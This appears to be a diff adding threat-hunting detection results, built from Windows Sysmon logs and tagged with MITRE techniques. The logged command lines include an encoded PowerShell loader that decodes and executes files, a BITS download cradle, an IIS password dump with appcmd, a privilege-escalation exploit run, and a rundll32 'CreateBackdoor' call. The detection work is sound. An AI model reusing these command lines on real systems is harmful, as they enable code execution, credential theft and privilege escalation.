+Prohibited Process connecting to internet,1595802375.141778,2020-07-27T02:26:15.141778+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 339223
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-07-26 22:13:19.375
+ 747F3D96-FF9D-5F1D-0000-00100AC62400
+ 7400
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 127.0.0.1
+ MSEDGEWIN10
+ 49796
+
+ false
+ 127.0.0.1
+ MSEDGEWIN10
+ 445
+ microsoft-ds
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.323652,2019-05-27T05:29:19.323652+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5955
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:19.283
+ 365ABB72-3D6F-5CEB-0000-00108FBFFF00
+ 168
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include ( -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt, -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt) in event with Command Line (powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4895
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:03.695
+ 747F3D96-660F-5D3F-0000-00106B508600
+ 6720
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-660F-5D3F-0000-001055378600
+ 2948
+ C:\Windows\System32\cmd.exe
+ cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1197] BITS Jobs - Process,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4895
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:03.695
+ 747F3D96-660F-5D3F-0000-00106B508600
+ 6720
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-660F-5D3F-0000-001055378600
+ 2948
+ C:\Windows\System32\cmd.exe
+ cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\Windows\System32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 112815
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-07 13:13:02.476
+ 747F3D96-095E-5EB4-0000-0010D46F1800
+ 5216
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "c:\Windows\System32\cmd.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-08F7-5EB4-0000-0020BAEC0200
+ 0x2ecba
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-095E-5EB4-0000-001002511800
+ 6396
+ C:\Windows\System32\changepk.exe
+ "C:\Windows\system32\ChangePk.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4895
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:03.695
+ 747F3D96-660F-5D3F-0000-00106B508600
+ 6720
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-660F-5D3F-0000-001055378600
+ 2948
+ C:\Windows\System32\cmd.exe
+ cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564913810.45591,2019-08-04T14:16:50.455910+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5950
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-04 10:16:49.960
+ 747F3D96-B091-5D46-0000-001081F71104
+ 820
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020B3D31800
+ 0x18d3b3
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-B080-5D46-0000-0010D4EA0F04
+ 2112
+ C:\Windows\System32\WSReset.exe
+ "C:\Windows\system32\WSReset.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1595802375.141764,2020-07-27T02:26:15.141764+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 339222
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-07-26 22:26:14.521
+ 747F3D96-0306-5F1E-0000-0010E15F3100
+ 3660
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-F938-5F1D-0000-0020E7030000
+ 0x3e7
+ 1
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-F938-5F1D-0000-00104B500000
+ 584
+ C:\Windows\System32\winlogon.exe
+ winlogon.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.555423,2019-05-27T05:29:20.555423+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5991
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:20.475
+ 365ABB72-3D70-5CEB-0000-0010F2EDFF00
+ 4012
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564834103.555174,2019-08-03T16:08:23.555174+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5452
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 12:08:23.391
+ 747F3D96-7937-5D45-0000-00100D290801
+ 4192
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-D4E9-5D45-0000-0020E7030000
+ 0x3e7
+ 1
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-7934-5D45-0000-0010CAB90701
+ 7564
+ C:\Windows\System32\consent.exe
+ consent.exe 896 272 00000280644BC500
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1589069378.023663,2020-05-10T04:09:38.023663+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 112969
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-10 00:09:36.703
+ 747F3D96-4640-5EB7-0000-0010EF364B01
+ 372
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ c:\Windows\System32\cmd.exe
+ c:\Users\IEUser\Tools\PrivEsc\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-3B92-5EB5-0000-0020E7030000
+ 0x3e7
+ 1
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-4640-5EB7-0000-0010292D4B01
+ 8028
+ C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe
+ NetworkServiceExploit.exe -i -c "c:\Windows\System32\cmd.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243516
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.518
+ 747F3D96-9F61-5E75-0000-00109B6C1E00
+ 6620
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243516
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.518
+ 747F3D96-9F61-5E75-0000-00109B6C1E00
+ 6620
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
